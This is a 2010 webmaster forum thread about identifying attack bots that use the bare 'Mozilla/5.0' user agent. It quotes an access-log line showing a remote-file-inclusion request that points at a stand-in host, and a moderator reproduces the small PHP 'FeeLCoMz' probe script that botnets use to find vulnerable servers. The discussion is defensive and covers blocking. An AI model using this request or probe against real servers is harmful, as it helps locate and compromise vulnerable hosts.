Welcome to WebmasterWorld Guest from 35.175.191.168

Forum Moderators: Ocean10000

Message Too Old, No Replies

Help identify attack tool with user agent: "Mozilla/5.0"

Server exploit attacks from APNIC use this user agent

     
3:52 pm on Feb 27, 2010 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts: 319
votes: 0


I am trying to get some details about a thorn in my server-side ;-)

For a couple of years I have been blocking attack bots with the exact user agent: "Mozilla/5.0"

There must be a hacktool with that default UA, but I cannot find any details about it.

Evidence (from Korean IP space):

218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"

Do any of you guys know what hack tool uses that default user agent? Most of these attacks have APNIC IP addresses, which I look up, convert into CIDRs, and add to my .htaccess and iptables Chinese Blocklists. The exploits are blocked by various rules in my .htaccess. I'm just curious about this user agent.

Thanks in advance; Wiz

[edited by: incrediBILL at 8:17 pm (utc) on Feb 27, 2010]
[edit reason] removed specifics to live bot net [/edit]

4:02 pm on Feb 27, 2010 (gmt 0)

System Operator from US 

incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14664
votes: 99


That's just a standard bot net attempting to upload a file to your server.

I get about 50+ of those every day for years now.
7:35 pm on Feb 27, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1995
votes: 75


Wizcrafts, i see those on hourly bases as well. Ask your self a question: Do I have any files on the server that end with ".txt"? That is all to it.

added: besides robots.txt
7:47 pm on Feb 27, 2010 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts:319
votes: 0


Guys;
I am already blocking all such exploit attacks. I was only asking if anybody knows what the actual hack tool might be, which has a default user agent of "Mozilla/5.0"? I am trying to identify the tool, not the attack vector.
8:16 pm on Feb 27, 2010 (gmt 0)

System Operator from US 

incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14664
votes: 99


Do I have any files on the server that end with ".txt"? That is all to it.


That's not it at all.

The file "http://example.com/columbus/heheh.txt" is a ping script residing on a compromised server they are attempting to upload into your server.

This is an active bot net running a live test for servers that respond.

The file heheh.txt looks like this:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>


If your server echoes that text then they flag your server for a return trip by the hacker.

I was only asking if anybody knows what the actual hack tool might be


It's just a standard bot net script, tons of them, many variations, no specific tool.
8:47 pm on Feb 27, 2010 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts:319
votes: 0


Thanks for the explanation Bill.
9:00 pm on Feb 27, 2010 (gmt 0)

Senior Member from GB 

WebmasterWorld Senior Member dstiles is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:May 14, 2008
posts: 3277
votes: 19


Thanks for the explanation of the txt? files, Bill. Always wondered what they expected to find. :)

My experience, Wizcrafts, is that a simple Mozilla/4.0 or Mozilla/5.0 on its own is usually from the Chinese block, though I have seen a few from the Eastern European countries. They aren't always loaded for .txt? or php files and I've wondered if they may be an Oriental MSIE work-alike, but it's worth blocking them.
1:01 am on Feb 28, 2010 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1995
votes: 75


Bill, you are absolutely right about botnets. What I mean is that any request that my sites are asked to serve with .txt extension are instant candidates for "Naturally Delicious Dried Mangoes". 403 Calories per serving to start with... due to the fact.